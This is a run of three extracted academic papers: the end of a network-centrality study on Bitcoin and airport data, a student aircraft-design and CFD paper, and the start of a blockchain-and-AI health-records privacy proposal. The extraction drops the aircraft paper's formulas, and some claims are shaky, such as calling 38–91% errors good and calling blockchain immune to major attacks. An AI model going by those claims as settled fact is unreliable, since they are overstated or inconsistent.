λ1 '0.139578. As with the previous cases, alpha and Katz centralities are very close to each other, they also agree more closely with CH,p on the most central addresses, but Table 4 shows that this is not the case in general. The trends shown by the Kendall rank correlation coefficient is similar to previous cases: there are more dissimilarities between PageRank and entropic centralities than between alpha/Katz and entropic centralities, but overall, entropic centralities give a different view point, as would be expected by extrapolating Borgatti’s view point. The assortativity coefficient of the illustrated Bitcoin subgraph is≈−0.11914239, suggesting a slight disassortativity. This is easily explained as an artefact of the way the subgraph was extracted (a small radius around a node), yielding a couple of hubs with nodes connected only to them (leaves). In this example, these leaves are having an entropic centrality influenced by having these hubs as their first neighbors. As a last scenario, we consider the small network of Maine airports, with their connecting flights, for a total of 55 airports (see Oggier, Phetsouvanh & Datta, 2018b for accessing the data.). We created the network based on flights involving passenger for the period of January 2018 as per the data obtained from the United States Department of Transportation Bureau of Transportation Statistics website (https: //www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=292). In Table 5, we synopsize the Kendall’s tau coefficient τκ. The lower the value of this coefficient, the closer (similar) two ranked lists are. We see that CH,unif produces results which are very similar to alpha and Katz centralities, but CH,p yields a reasonably distinct result instead. Furthermore, results from both PageRank applied to both weighted and unweighted graphs are most distinct both with respect to entropic centralities, as well Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 17/21 https://peerj.com https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=292 https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=292 http://dx.doi.org/10.7717/peerj-cs.220 Table 5 Kendall rank correlation coefficient τκ across the centrality algorithms for the airports net- work data. Uniform Non-uniform Alpha PageRank PageRank Katz (α = 0.1) (UW) (W) (α = 0.1) uniform entropic 0 0.1730 0.0242 0.2087 0.2484 0.0242 non-uniform entropic 0.1730 0 0.1555 0.2228 0.2962 0.1555 alpha 0.0242 0.1555 0 0.2114 0.2390 0 PageRank(UW) 0.2087 0.2228 0.2114 0 0.2713 0.2114 PageRank(W) 0.2484 0.2962 0.2390 0.2713 0 0.2390 Katz 0.0242 0.1555 0 0.2114 0.2390 0 as the other existing centralities explored in our experiments. The assortative coefficient is ≈−0.71478751, this is thus a disassortative network. Indeed it contains two airports that serve as hubs, and small airports connected to it (or important airports whose edges have been cut when extracting the specific subgraph). In terms of entropic centrality, this corresponds to having small airports inheriting the influence of being connected to hubs. CONCLUSIONS In this paper, we studied the concept of entropic centrality proposed by Tutzauer (2007), which originally determined the importance of a vertex based on the extent of dissemination of an indivisible flow originating at it, by considering the uncertainty in determining its destination. We extended this concept to model divisible flows, which better reflect certain real world phenomenon, for instance, flows of money. In fact, one of the motivating scenarios that prompted us to study this model was to study the network induced by Bitcoin transactions—though, in the course of the work, and to validate the model, we also identified and analyzed other use cases, with arbitrary divisions of the flow. A previous work which considered only equitable divisions of the flow was shown to be a special case of the general model studied in this paper. The flow based entropic centrality model bears in spirit some similarity with eigenvector based centrality measures in the sense that the importance of vertex node is determined by taking into account a transitive effect, namely, connections to a central vertex contributes to increase the centrality. We thus compared our approach with several representatives of this family, specifically alpha centrality, PageRank and Katz centrality. We observed that alpha and Katz centralities are closer to entropic centralities than PageRank (in terms of Kendall tau distance), but they are still fairly different. This could be extrapolated from the view point of Borgatti (2005), which advocates to use path based centrality for transfer type of flow, and not eigenvector based centralities, which are best suited for duplication. This indicates that the new entropic centrality provides novelty not only in the principled manner in which it captures the phenomenon of divisible flows, but also in terms of the results and associated insights obtained from it. Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 18/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 ADDITIONAL INFORMATION AND DECLARATIONS Funding The work of Phetsouvanh Silivanxay was supported by a NTU Singapore scholarship for doing his PhD. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: NTU Singapore scholarship. Competing Interests Anwitaman Datta is an Academic Editor for PeerJ. Author Contributions • Frédérique Oggier conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Silivanxay Phetsouvanh performed the experiments, prepared figures and/or tables, performed the computation work, approved the final draft. • Anwitaman Datta conceived and designed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The Tehran stock exchange dataset came from Dastkhan H, Gharneh NS. 2016. Determination of systematically important companies with cross-shareholding network analysis: a case study from an emerging market. International Journal of Financial Studies 4(3):13 DOI 10.3390/ijfs4030013 and the authors can be contacted at nshams@aut.ac.ir for the dataset. The Bitcoin dataset from the Bitcoin transactions log is available at Oggier, Frederique Elise; Phetsouvanh, Silivanxay; Datta, Anwitaman, 2018, ‘‘A 4571 node directed weighted Bitcoin address subgraph’’, 10.21979/N9/IEPBXV, DR-NTU (Data), V1. The Maine airport network dataset is available at Oggier, Frederique Elise; Phetsouvanh, Silivanxay; Datta, Anwitaman, 2018, ‘‘Maine airport network in January 2018’’, Available at 10.21979/N9/WM0K5W, DR-NTU (Data), V1. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.220#supplemental-information. Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 19/21 https://peerj.com https://doi.org/10.3390/ijfs4030013 mailto:nshams@aut.ac.ir https://doi.org/10.21979/N9/IEPBXV https://doi.org/10.21979/N9/WM0K5W http://dx.doi.org/10.7717/peerj-cs.220#supplemental-information http://dx.doi.org/10.7717/peerj-cs.220#supplemental-information http://dx.doi.org/10.7717/peerj-cs.220 REFERENCES Benzi M, Klymko C. 2015. On the limiting behavior of parameter-dependent network centrality measures. SIAM Journal on Matrix Analysis and Applications 36(2):686706. Bonacich P. 1972. Factoring and weighting approaches to status scores and clique identification. Journal of Mathematics Sociology 2:113–120 DOI 10.1080/0022250X.1972.9989806. Bonacich P, Lloyd P. 2001. Eigenvector-like measures of centrality for asymmetric relations. Social Networks 23(3):191–201 DOI 10.1016/S0378-8733(01)00038-7. Borgatti SP. 2005. Centrality and network flow. Social Networks 27:55–71 DOI 10.1016/j.socnet.2004.11.008. Dastkhan H, Gharneh NS. 2016. Determination of systematically important companies with cross-shareholding network analysis: a case study from an emerging market. International Journal of Financial Studies 4(3):1–17. Estrada E. 2011. The structure of complex networks: theory and applications. Oxford: Oxford University Press. Fan R, Xu K, Zhao J. 2017. A GPU-based solution for fast calculation of the be- tweenness centrality in large weighted networks. PeerJ Computer Science 3:e140 DOI 10.7717/peerj-cs.140. Iannelli F, Mariani MS, Sokolov IM. 2018. Influencers identification in complex networks through reaction-diffusion dynamics. Physical Review E 98:062302. Katz L. 1953. A new status index derived from sociometric analysis. Psychometrika 18(1):39–43. Kendall MG. 1938. A new measure of rank correlation. Biometrika 30(1–2):81–93 DOI 10.1093/biomet/30.1-2.81. Kondor D, Pósfai M, Csabai I, Vattay G. 2014. Do the rich get richer? an empirical analysis of the bitcoin transaction network. PLOS ONE 9(2):e86197. Migliore M, Martorana V, Sciortino F. 1990. An algorithm to find all paths be- tween two nodes in a graph. Journal of Computational Physics 87:231–236 DOI 10.1016/0021-9991(90)90235-S. Nakamoto S. 2008. Bitcoin: a peer-to-peer electronic cash system. Newman MEJ. 2009. Mathematics of networks. In: The New Palgrave dictionary of eco- nomics. London: Palgrave Macmillan UK DOI 10.1057/978-1-349-95121-5_2565-1. Nikolaev AG, Razib R, Kucheriya A. 2015. On efficient use of entropy centrality for social network analysis and community detection. Social Networks 40:154–162. Oggier F, Phetsouvanh S, Datta A. 2018a. A 4571 node directed weighted Bitcoin address subgraph. In: Dataverse. DOI 10.21979/N9/IEPBXV. Oggier F, Phetsouvanh S, Datta A. 2018b. Maine airport network in January 2018. In: Dataverse. DOI 10.21979/N9/WM0K5W. Oggier F, Silivanxay P, Datta A. 2018. Entropic centrality for non-atomic flow network. In: International symposium on information theory and its applications (ISITA). Piscataway: IEEE. Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 20/21 https://peerj.com http://dx.doi.org/10.1080/0022250X.1972.9989806 http://dx.doi.org/10.1016/S0378-8733(01)00038-7 http://dx.doi.org/10.1016/j.socnet.2004.11.008 http://dx.doi.org/10.7717/peerj-cs.140 http://dx.doi.org/10.1093/biomet/30.1-2.81 http://dx.doi.org/10.1016/0021-9991(90)90235-S http://dx.doi.org/10.1057/978-1-349-95121-5_2565-1 http://dx.doi.org/10.21979/N9/IEPBXV http://dx.doi.org/10.21979/N9/WM0K5W http://dx.doi.org/10.7717/peerj-cs.220 Opsahl T, Agneessens F, Skvoretz J. 2010. Node centrality in weighted networks: generalizing degree and shortest paths. Social Networks 32(3):245–251. Page L, Brin S, Motwani R, Winograd T. 1999. The PageRank citation ranking: bringing order to the web. Stanford: Stanford InfoLab. Phetsouvanh S, Oggier F, Datta A. 2018. EGRET: extortion graph exploration techniques in the bitcoin network. In: IEEE ICDM workshop on data mining in networks (DaMNet). Piscataway: IEEE. Schoch D, Valente TW, Brandes U. 2017. Correlations among centrality indices and a class of uniquely ranked graphs. Social Networks 50:46–54. Tutzauer F. 2007. Entropy as a measure of centrality in networks characterized by path- transfer flow. Social Networks 29(2):249–265. Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 21/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 work_tbq5gksxpvdpph6wuaxrj725ju ---- Your Paper's Title Starts Here: Please Center American Journal of Engineering Research (AJER) 2016 American Journal of Engineering Research (AJER) e-ISSN: 2320-0847 p-ISSN : 2320-0936 Volume-5, Issue-9, pp-139-145 www.ajer.org Research Paper Open Access w w w . a j e r . o r g Page 139 Aircraft Design Analysis, CFD And Manufacturing Haifa El-Sadi* Wentworth institute of technology, 550 Huntington, Boston, MA, USA ABSTRACT: Aircraft design, manufacturing and CFD analysis as part of aerodynamic course, the students achieve sizing from a conceptual sketch, select the airfoil geometry and the tail geometry, calculate thrust to weight ratio and wing loading, use initial sizing and calculate the aerodynamic forces. The students design their aircraft based on the geometrical dimensions resulted from the calculations and use the model to build a prototype, test it in wind tunnel and achieve CFD analysis to be compared with the experimental results. The theory of aerodynamic is taught and applied as a project based. In this paper, the design process, aircraft manufacturing and CFD analysis are presented to show the effect of project based on student’s learning of aerodynamic course. This project based learning has improved and accelerated students understanding of aerodynamic concepts and involved students in a constructive exploration. The analysis of the aircraft resulted in a study that revolved around the lift and drag generation of this particular aircraft. As to determine the lift and drag forces generated by this plane, a model was created in Solidworks a 3-D model-rendering program. After this model was created it was 3-D printed in a reduced scale, and subjected to wind tunnel testing. The results from the wind tunnel lab experiment were recorded. For accuracy, the same 3-D model was then simulated using CFD simulation software within Solidworks and compared with the results from the wind tunnel test. The values derived from both the simulation and the wind tunnel tests were then compared with the theoretical calculations for further proof of accuracy. Keywords: computational fluid dynamics (CFD), design, aircraft, aerodynamic, wind tunnel I. INTRODUCTION The conceptual design phases begins a conceptual sketch and aims to determine key design parameters that the final aerodynamics will have to meet. This design will typically include the approximate wing and tail geometries, fuselage shape, and the internal locations of major components such as the engine, cockpit, payload/passenger compartments, landing gears, and fuel tanks. These design requirements are used to estimate the weight of the final aircraft by comparison to previous designs. The takeoff weight is a critical characteristic that will dictate the final size and shape of the airfoil. Iterative calculations for this weight are made using assumptions from previous aircraft designs and aerodynamic AIAA table standards [1, 4, 5, and 7]. The final lift requirements will then determine required airfoil size and shape, with more iterative refinements made between steps. GennaroZuppardi shows that an interactive and wholly automatized computer code has been developed on a microcomputer for the aerodynamic analysis of airfoils in incompressible now fields, it is intended to serve as a useful support in teaching aerodynamics. The code contains a number of modules (or blocks) for: (1) drawing the shape with the help of an interactive graphic device interfaced with the microcomputer; (2) computing the aerodynamic inviscid and viscous flow field and the aerodynamic coefficients; (3) modifying and/or correcting the body shape and then computing the new aerodynamic coefficients [6]. Mark Drela presents some of his views on teaching fluid dynamics and aerodynamics that the course syllabus stresses physical and mathematical understanding of underlying concepts rather than specialized engineering or computational skills, it is argued that deep understanding is what enables the engineer or researcher to generate truly new ideas and work on out of the ordinary topics and to continue personal learning and development throughout a career [3, 7]. The goal of this paper and its research is to show the students the steps of aerodynamic design and perform their own design and compare three types of acquired lift results for their own designed aircraft. Following proven aerodynamic formulas and AIAA airfoil charts, assumptions were made to provide a baseline weight from which the iterations were run to refine the final design weight. This finalized weight was then used to calculate the geometry of the wings, fuselage, airfoil, and tail section of the aircraft. This geometry was used to model the complete aircraft in computer aided design software and a 1:584 scale model was 3D printed for wind tunnel testing. The wind tunnel was used to measure lift and drag forces for various angles of attack that http://www.sciencedirect.com/science/article/pii/0360131587900029 American Journal of Engineering Research (AJER) 2016 w w w . a j e r . o r g Page 140 could then be compared to both the iterative calculations as well as the results calculated through computational fluid dynamics. II. DESIGN ANALYSIS METHODS Phase #1 theoretical calculations The theoretical calculations is a useful method as to further define the usage of the aircraft. These calculations will give an idea of the basic structure to the design team. Properties that are highly important to a newly designed aircraft are directly resulted from this stage of design. The design team will use this tool to determine the range and weight limitations of the aircraft. Before the modeling phase a type of wing will be selected and further refined in later phases of design. The design weight was calculated by taking the weight of everything that was part of the plane and adding it all together. This was used to initially calculate the weight to be used for the design. The empty weight was calculated in accordance with the Woguess weight in order to iterate with the calculated design weight. By using multiple iterations the design weight could be narrowed down to one true value. Empty Weight Fraction The recalculated empty weight fraction was used with the intention of recalculating the design weight. Which would be the final weight that would be used in the design. This was necessary for not only recalculating the design weight but also the fuselage. Recalculated Empty Weight Fraction The recalculated design weight was taken in order to calculate the final design weight used in the design using the recalculated empty weight fraction. This formula is also used to determine the value of the recalculated fuselage length. Recalculated Design Weight Fuselage Length Fuselage Area Span American Journal of Engineering Research (AJER) 2016 w w w . a j e r . o r g Page 141 AR is an aspect ratio which is the ratio of its length to its chord. A low aspect ratio indicates short, stubby wings while a high aspect ratio indicates long narrow wings. This equation is used to determine the true aspect ratio. The length of the wing span is determined using the aspect ratio and is also vital to the geometry and design of the aircraft. It’s determined by taking the square root of the product of the aspect ratio and area of the wing. The wing area is also a vital component to the design of the aircraft, calculated by simply multiplying the wing thickness by the span. Wing Area The horizontal tail is required in any plane for flight. With the fuselage and wings accounted for the design of the tail is all that is missing. The horizontal tail is determined by multiplying 0.1 by the thickness ratio. Lift forces contrast with the drag force and is the component of the force of a fluid flowing past the aircraft perpendicular to the oncoming flow direction. The lift and forces were determined at different angles of attack from 0 to 15 degrees. The first priority of testing was to render a three dimensional representation of the proposed design using Solidworks. Using the calculated dimensions for the fuselage. Following the fuselage, the wings needed to be modeled. The airfoil chosen for the aircraft was the NACA 2415. Using the calculated values for span, chord lengths (root, mean, and tip), mean chord span, one wing was modeled and then mirrored in Solidworks for consistency throughout the entire wing span, as shown in table 1 and Figure 1. Table 1. Aircraft Dimensions American Journal of Engineering Research (AJER) 2016 w w w . a j e r . o r g Page 142 Fig. 1. Solid works model of aircraft PHASE #2 wind tunnel laboratory experiment Upon completing all parts of the aircraft, they were assembled together to produce the final model of the proposed aircraft (as shown in Figure 2). This model was scaled down 1:585 in order to print it using the uPrinter 3-D printer located in the Manufacturing Center at Wentworth Institute of Technology. The material that the model was printed with was ABSplus Plastic American Journal of Engineering Research (AJER) 2016 w w w . a j e r . o r g Page 143 Fig. 2. The 3D printed model PHASE #3 CFD simulation A CFD study in the Solidworks program paralleled the experimental wind tunnel analysis. The same conditions were reproduced within the program. The exact same scaled model was also studied. As to ensure accuracy each study was performed independently and uninfluenced by one another. The model created in the Solidworks program was then prepared for simulation. The meshing function of the simulation proved to be highly instrumental in attaining accurate results from the CFD. Figure 3 shows the contour of the pressure and figure 4 shows the streamlines of air around the aircraft. Fig. 3. The pressure contour of the airplane American Journal of Engineering Research (AJER) 2016 w w w . a j e r . o r g Page 144 Fig. 4. The streamlines of the air around the airplane The comparison between the experiments and the CFD simulation has been carried out as shown in Figures 5 and 6. At low angle of attack the difference between the experiments and CFD is slightly significant comparing to high angle of attack for both drag and lift forces. Parasitic drag in the CFD simulation was not indicative of what we found in the theoretical calculations. Further refinement of this model would likely reduce the percent difference observed, although not by much. In contrast, the lift percent error ranged from only 38 to 91% which is quite good considering the many assumptions made. Overall, a trend can still be seen in these two sets of data: a positive correlation between drag and lift as a function of angle of attack. As angle of attack increases, so do both drag and lift. This makes sense because as the plane pitches up more surface area is in contact with the flow, causing more drag. But at the same time, the increased angle of attack on the airfoil creates a greater pressure drop because the air moves faster over the top of the wing, attributing to more lift. This trend carried over to the comparison between the CFD and wind-tunnel tests of the 1:585 scale model. Teams were made aware that the wind tunnel would not be a very accurate measurement tool. It was not designed to simulate the conditions the project required, nor were the 3D models perfect representations of the CFD models. Despite these truths, percent error for both lift and drag fell between 6.56 and 99% for both the 22.5 and 29.7 mph wind tunnel trials. Given the circumstances, these results were considered successful, as they still provide a valid representation of angle of attack’s effects on both lift and drag on aircraft. In retrospect, more could have been done to reduce the gross percent errors that were experienced during the design process, primarily in testing equipment and procedure, but the concepts applied would remain the same. The three phases of design and assumptions that were made based on the A380 produced somewhat reasonable lift and drag results for the designed aircraft’s aerodynamics. Table 2 shows the comparison of the results of drag and lift forces. American Journal of Engineering Research (AJER) 2016 w w w . a j e r . o r g Page 145 Fig. 5. Comparing Drag-experiment and CFD vs. angle of attack Fig. 6. Comparing Drag-experiment and CFD vs. angle of attack III. CONCLUSION The three phases of design were critical in following a set design procedure, and using the assumptions to make reasonable estimates for our own model. While these assumptions assisted in moving the design along, they greatly contributed to the errors we would see between our different data trials: the theoretical manual calculations, CFD simulation, and scale model wind tunnel test. These various paths allowed us to better understand different means of data acquisition for airfoils, and helped affirm validity in our design process. Overall, a trend can still be seen in these two sets of data: a positive correlation between drag and lift as a function of angle of attack. As angle of attack increases, so do both drag and lift. This makes sense because as the plane pitches up more surface area is in contact with the flow, causing more drag. But at the same time, the increased angle of attack on the airfoil creates a greater pressure drop because the air moves faster over the top of the wing, attributing to more lift. It is concluded that this project-based learning has improved and accelerated students understanding of aerodynamic concepts and involved students in a constructive exploration American Journal of Engineering Research (AJER) 2016 w w w . a j e r . o r g Page 146 E - Endurance R - Range C Cruise - Specific Fuel Consumption C Loiter - Loitering Specific Fuel Consumption V - Cruise Velocity L - Lift Force D - Drag Force W empty - Average Weight Empty W Crew - Average Weight of Crew W Payload - Average Weight of Payload W Max - Average Maximum Weight L f - Fuselage Length S f - Fuselage Area S wing - Wing Area S wet - Aircraft Wetted Area S HT - Horizontal Tail Area HT - Horizontal Tail L ww - Wing Weight q - Dynamic Pressure C Lmax - Max Lift Coefficient of Wing C L - Lift Coefficient of Wing C1 - Lift Coefficient of Airfoil AR - Aspect Ratio b - Wing Span T - Thrust REFERENCES [1]. Anderson, Jr., J.D., 2012, Introduction to Flight, McGraw-Hill, seventh edition [2]. J.J. Bertin, Aerodynamics for Engineers, 5th ed., Prentice Hall, 2008. [3]. Kuethe, A.M. and Chow, C.-Y., Foundations of Aerodynamics, 5th ed., Wiley, 1997 [4]. Houghton, E.L. and Carruthers N.B., Aerodynamics for Engineering Students, 3rd ed., Arnold, 1982 [5]. Daniel P.Raymer,“Aircraft Design: AConceptual Approach”, published by American Institute of Aeronautics and Astronautics,Inc. [6]. GennaroZuppardi, Luigi G. Napolitano, “Teaching aerodynamics using a microcomputer”, Computers & Education, Volume 11, Issue 2, 1987, Pages 73–84 [7]. Mark Drela, “Assorted views on teaching of aerodynamics”, 16th AIAA Applied Aerodynamics Conference, , AIAA-98-2792 work_tbt4lajyr5aenhlg2mr3q6h3wi ---- Artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records Artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records Fahad F. Alruwaili Computer Science, College of Computing and Information Technology, Shaqra University, Shaqra, Kingdom of Saudi Arabia ABSTRACT Background: Application of Artificial Intelligence (AI) and the use of agent-based systems in the healthcare system have attracted various researchers to improve the efficiency and utility in the Electronic Health Records (EHR). Nowadays, one of the most important and creative developments is the integration of AI and Blockchain that is, Distributed Ledger Technology (DLT) to enable better and decentralized governance. Privacy and security is a critical piece in EHR implementation and/or adoption. Health records are updated every time a patient visits a doctor as they contain important information about the health and wellbeing of the patient and describes the history of care received during the past and to date. Therefore, such records are critical to research, hospitals, emergency rooms, healthcare laboratories, and even health insurance providers. Methods: In this article, a platform employing the AI and the use of multi-agent based systems along with the DLT technology for privacy preservation is proposed. The emphasis of security and privacy is highlighted during the process of collecting, managing and distributing EHR data. Results: This article aims to ensure privacy, integrity and security metrics of the electronic health records are met when such copies are not only immutable but also distributed. The findings of this work will help guide the development of further techniques using the combination of AI and multi-agent based systems backed by DLT technology for secure and effective handling EHR data. This proposed architecture uses various AI-based intelligent based agents and blockchain for providing privacy and security in EHR. Future enhancement in this work can be the addition of the biometric based systems for improved security. Subjects Adaptive and Self-Organizing Systems, Agents and Multi-Agent Systems, Artificial Intelligence Keywords Artificial intelligence, Agents and multi-agent systems, Adaptive & self-organizing systems, Electronic health records, Distributed ledger systems INTRODUCTION The rapid improvement of digitizing the healthcare has led to the creation of huge electronic records of patients. Such progress paves a way for unparalleled demands for the protection of healthcare data and at the time of utilizing and transferring these data. E-Health systems can be a better alternative for maintaining the medical records globally How to cite this article Alruwaili FF. 2020. Artificial intelligence and multi agent based distributed ledger system for better privacy and security of electronic healthcare records. PeerJ Comput. Sci. 6:e323 DOI 10.7717/peerj-cs.323 Submitted 31 August 2020 Accepted 7 November 2020 Published 30 November 2020 Corresponding author Fahad F. Alruwaili, alruwaili@su.edu.sa Academic editor Faizal Khan Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.323 Copyright 2020 Alruwaili Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.323 mailto:alruwaili@�su.�edu.�sa https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.323 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ and connectedly and can be further accessed the clinical information on the basis of its requirement (Wiljer et al., 2008). There is a rapid increase in the applicants of EHR in E-Health which uses the mobile based devices in order to provide medical assistance. Some of the medical services such as acquisition of data through online, and also in person, transferring these data towards other medical service providers etc. The EHR is a digital based medical data preserving and processing platform which is easily accessible to the patient as well as the doctors (Zurita & Nøhr, 2004). The main aim of this EHR is to monitor and to maintain the patients’ medical data more securely. This includes the overall medical history of the patient, current health condition, demographic details about the patient etc. This EHR acts as a repository for storing, transferring the medical data more securely (Kumar & Lee, 2011). The patient, doctor and the medical service provider can fetch the data whenever and where ever necessary. Service providers need to update the given services to maintain consistency. In fact, various regulations and standards have been proposed by earlier researchers (OECD, 2013) in order to protect the privacy of EHR. These rules and regulations require tough measures of security while sharing and exchanging the health data. If the sharing failed to follow the rules, strong sanctioned were imposed on the violators with severe penalties. The introduction of AI and multi-agent based systems into the health data make it easy for the management to take its decisions and the actions, and ensures the communication and coordination by minimizing the errors of analysis and treatment, and by improve time required to look for the medical resources, and other medical departments. The main goal of AI-based EHR security is to create methodology, tools, and facilities for the maintenance and transfer of health data through the EHR. Electronic Health Records are live and systems based on the patient. This makes the patient data to be accessed and handled by users who are authorized to use it. These data are in a digital format which is collected based on the already developed standards for maintaining the patients’ health records. In this EHR, the data can be handled by the patient or an authorized doctor and the service provider. It is stored in a cloud-based servers which can be accessed only by the users (Zhang et al., 2015; Shinde & Patil, 2015). The users and the data were connected through a network. All the requests and transmissions were done through the network (Shinde & Patil, 2015). Though there were various advantages present in this EHR, it is more vulnerable to various types of attacks. This is due to its design architecture (Om & Talib, 2011). Various threats in the level of collecting data (Habib, Torjusen & Leister, 2015; Saleem, Ullah & Kwak, 2011; Chelli, 2015; Kumar & Lee, 2011; Saleem, Ullah & Yoo, 2009; Om & Talib, 2011), transmission (Ismail & Ammar, 2020; Partala et al., 2013; Niksaz, 2015; Bonab & Masdari, 2015), and storage (Santos-Pereira et al., 2013; Zhang & Liu, 2010; Drosatos et al., 2016; Fatema & Brad, 2014; Wellington, 2013) were present in this EHR’s. Due to these threats, some of the users are concerned to employ this EHR to save and transmit their health data (Ismail & Ammar, 2020). Hence, a novel methodology for providing privacy and security combining the AI-based intelligent agents and blockchain is proposed in this article. Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 2/14 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ Contributions of the present research � Various techniques were proposed earlier researchers for enhancing the security and electronic based health record. Enhancement of EHR systems are under process. � A proposal of combining the AI, agent based systems along with the Blockchain based technology for providing privacy and security in the Electronic Health Record. � The proposed AI-based DLS technology achieves better accuracy in providing security and privacy while utilizing and sharing the EHR data. This research work is done in order to analyze the drawbacks present in the existing privacy and security preserving methodologies for the EHR data sets and to propose a novel method for providing privacy and security in it. Attributes of the Distributed Ledger Technology � A DLT is a distributed digital record of transactions (Zhang, Zhong & Tian, 2017; Zhang et al., 2017). The terminology comes from its structure, where, the individual records called blocks. These blocks are linked together with each other, and in accordance with the implemented consensus protocol, in single list which is called a chain. The current implementation of DLT is now seeing in recording crypto currencies transactions. The notion of decentralization is core component; hence, any involved transactions cannot be altered without the alteration of all concurrent blocks. � The key characteristics of the DLT include � Decentralization � Persistency � Anonymity and � Auditability � The key advantages and features of DLT technologies, includes: � Immutability: It means one-way writing to the ledger, hence difficult to tamper or alter a block or committed transaction. � Irreversibility: It prevents double spending. � Distribution of records: It means that a copy of the ledger is present with all its members. � No Centralized Authority or third party: It is a peer-to-peer network. � Resiliency: It is not prone to any sort of major attacks. Blockchain Blockchain (DLT) is considered to be the next big technological revolution, as it is reinventing the way we work and live (Zheng et al., 2018; Perdana et al., 2020; Sun et al., 2020). The structure of blockchain is shown in Fig. 1. The idea of the DLT was first introduced by a researcher who implemented the digital crypto currency known as Bitcoin. DLT has become an integral part of bitcoin’s operation (Li et al., 2019). For several decades, researchers have been dealing with information exchange and the transfer of money and other assets through online transactions through the Internet, where each of Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 3/14 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ these transactions involved a trusted intermediary. It is provides a secure exchange and traceability in the event of any failures in case of a security breach. In a shift of paradigm, the DLT removes centralized authority which is present in-between multiple entities which are processing the financial and other transactions on data using a public ledger which is incorruptible, immutable, and decentralized in nature. The DLT based technology can come up with acceptable results in the certification system for learning, receivable to the non-changeable and the cryptographic nature of the data based on blockchain. It can complete complex transaction operations without human intervention. The system also supports automatic execution and automatic verification. Smart contract technology can simplify the process of transaction, smart realization, making it automated and decentralized and to enhance the security of the transaction. AI and Multi agent based systems AI is the process of recognizing something it has never seen before and predict the future, by extracting patterns in the past (Harel, Gal & Elovici, 2017; Bali, Garg & Bali, 2019). AI deals with the study and design of intelligent based agents which maintains the environment, takes actions which increases the chance for occurring success. Intelligent agents or adaptive & self-organizing systems are autonomous based system which is more flexible in receiving and processing the input for generating the output with respect to the input. Agent-based systems are communicating systems of distributed AI. These systems work by communicating with each other based on a set of rules and constraints in order to solve a common problem. However, agent-based systems usually consist of one learning AI agent and other Pattern of AIs. An AI-based multi-agent system is a computerized system which consists of multiple interacting intelligent agents. Multi-agent systems can solve problems which are difficult for an individual system. These intelligent based agents can get the data in the form of knowledge directly from the users. These users can be also called as environment. Intelligent agents can perform a specific task for the given inputs. These systems can process the inputs from humans or other form of agents. These agents can also be able to combine with other agents in order to perform a process. Generating a system based on the intelligent agent is not a difficult process since it can be done just by combining the existing agents with agents. This forms the multi agent based architecture. For example, a network monitoring agent can be created by Figure 1 Structure of blockchain. Full-size DOI: 10.7717/peerj-cs.323/fig-1 Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 4/14 http://dx.doi.org/10.7717/peerj-cs.323/fig-1 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ combining the network system with an agent by not altering the entire mechanism. Architecture of an intelligent agent is shown in Fig. 2. The security and privacy opportunity The DLT combined with AI integration presents a new and innovative approach to achieve smart, resilient and secure handling of EHR data. Various works has been done by previous researchers regarding the security and privacy using the Multi agent bases systems (Tsochev et al., 2018; Grzonka et al., 2018; Ahmed et al., 2020; Gruson et al., 2019; Stein et al., 2019). The fact that increased adoption of autonomous systems e.g. internet of things, opens the door for insecure and cyber-criminal activities, hence a greater need to ensure security, control and compliance. With this increased connectivity and reliance of other healthcare systems across different healthcare stakeholders (e.g., pharmacy, imagery, prescriptions, physicians, insurance) a greater need for privacy protection to keep patients and hospitals records safe and secure is critical. The gap intensifies when urgent actions are needed to protect or recover EHR transactions against cyberattacks. The utility of greater intelligence in making decisions about threats and cyberattacks can be utilized. The AI agents are used to gather the necessary threats/cyberattacks information from multiple deployed sensors to help steer the decision making process. In addition, automation of actionable policies to protect EHR can be codified into a smart contracts with will be triggered based on the given event (IF-THEN-ELSE condition statement). Figure 3 shows the main important characteristics of the Blockchain (DLT) and AI. Proposed methodology The proposed methodology is designed to provide privacy and security in EHR database using the application of Artificial Intelligence and Multi Agent based Distributed Ledger System. This framework is secured since the blockchain and various software based Figure 2 Architecture of the multi agent-based system. Full-size DOI: 10.7717/peerj-cs.323/fig-2 Alruwaili (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.323 5/14 http://dx.doi.org/10.7717/peerj-cs.323/fig-2 http://dx.doi.org/10.7717/peerj-cs.323 https://peerj.com/computer-science/ agents are used in between the data which are available in the public servers. In this method, the user has full privilege to access the system. The user can update, edit, modify and delete the contents present in the database which is connected with the system. Architecture of the proposed system is shown in Fig. 4 which has two types intelligent agent such as the user interface agent, DLT based authentication agent. This forms the multi agent based technology. The user interface agent collects all the information about users who are accessing the database. 